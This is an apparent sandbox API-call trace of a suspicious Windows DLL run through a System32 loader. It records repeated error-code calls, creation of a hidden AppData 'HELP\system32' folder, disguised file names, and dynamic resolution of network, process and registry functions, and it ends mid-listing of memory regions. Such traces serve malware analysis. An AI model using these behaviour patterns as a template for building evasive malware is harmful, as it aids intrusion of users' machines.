[0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.018] GetLastError () returned 0x0 [0035.018] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.019] GetLastError () returned 0x0 [0035.019] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.020] SetLastError (dwErrCode=0x0) [0035.020] GetLastError () returned 0x0 [0035.021] SetLastError (dwErrCode=0x0) [0035.021] GetLastError () returned 0x0 [0035.021] SetLastError (dwErrCode=0x0) [0035.021] GetLastError () returned 0x0 [0035.021] SetLastError (dwErrCode=0x0) [0035.021] GetLastError () returned 0x0 [0035.021] SetLastError (dwErrCode=0x0) [0035.021] GetLastError () returned 0x0 [0035.021] SetLastError (dwErrCode=0x0) [0035.021] GetLastError () returned 0x0 [0035.021] SetLastError (dwErrCode=0x0) [0035.021] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.028] SetLastError (dwErrCode=0x0) [0035.028] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.029] GetLastError () returned 0x0 [0035.029] SetLastError (dwErrCode=0x0) [0035.030] GetLastError () returned 0x0 [0035.030] SetLastError (dwErrCode=0x0) [0035.030] GetLastError () returned 0x0 [0035.030] SetLastError (dwErrCode=0x0) [0035.030] GetLastError () returned 0x0 [0035.030] SetLastError (dwErrCode=0x0) [0035.030] GetLastError () returned 0x0 [0035.030] SetLastError (dwErrCode=0x0) [0035.030] GetLastError () returned 0x0 [0035.030] SetLastError (dwErrCode=0x0) [0035.030] GetLastError () returned 0x0 [0035.030] SetLastError (dwErrCode=0x0) [0035.030] GetLastError () returned 0x0 [0035.030] SetLastError (dwErrCode=0x0) [0035.030] GetLastError () returned 0x0 [0035.030] SetLastError (dwErrCode=0x0) [0035.031] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0035.031] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0035.031] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0035.031] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fa88 | out: lpSystemTimeAsFileTime=0x12fa88*(dwLowDateTime=0xe2907750, dwHighDateTime=0x1d3dfba)) [0035.032] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12f9c0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.032] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12f8a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetLastError () returned 0x0 [0035.032] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.032] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0035.032] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.032] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.033] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.033] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.033] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0035.033] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0035.033] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0035.033] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0035.033] GetLastError () returned 0xb7 [0035.033] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.033] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0035.033] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0035.033] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0035.033] wsprintfA (in: param_1=0x12f728, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.033] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0035.033] wsprintfA (in: param_1=0x12f624, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.033] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.033] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0035.033] CloseHandle (hObject=0x74) returned 1 [0035.033] GetLastError () returned 0x0 [0035.033] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0035.033] GetLastError () returned 0x0 [0035.033] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0035.034] GetSystemDirectoryA (in: lpBuffer=0x12f728, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.034] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.034] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0035.034] CloseHandle (hObject=0x74) returned 1 [0035.034] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.034] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.034] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0035.035] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.036] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0035.036] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0035.036] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0035.036] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0035.036] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0035.036] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0035.036] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0035.036] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0035.036] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0035.036] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0035.036] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0035.036] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0035.036] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0035.036] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0035.036] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0035.036] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0035.036] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0035.037] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0035.038] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0035.038] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.038] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0035.038] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0035.038] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0035.038] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0035.038] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0035.038] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0035.038] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0035.038] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0035.038] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0035.038] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0035.038] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0035.038] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0035.038] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0035.038] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0035.038] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0035.038] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0035.039] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0035.039] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0035.039] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0035.039] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0035.039] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0035.039] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0035.039] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0035.039] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.039] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.039] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.039] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0035.041] HeapDestroy (hHeap=0x1320000) returned 1 Process: id = "53" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fae0" os_pid = "0xcf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"explorer.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2339 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2340 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2341 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2342 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2343 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2344 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2345 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2346 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2347 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 2348 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2349 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2350 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2351 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 2352 start_va = 0x310000 end_va = 0x376fff entry_point = 0x310000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2353 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2354 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2355 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2356 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2357 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2358 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2359 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2360 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2361 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2362 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2363 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2364 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2365 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 2366 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2367 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = 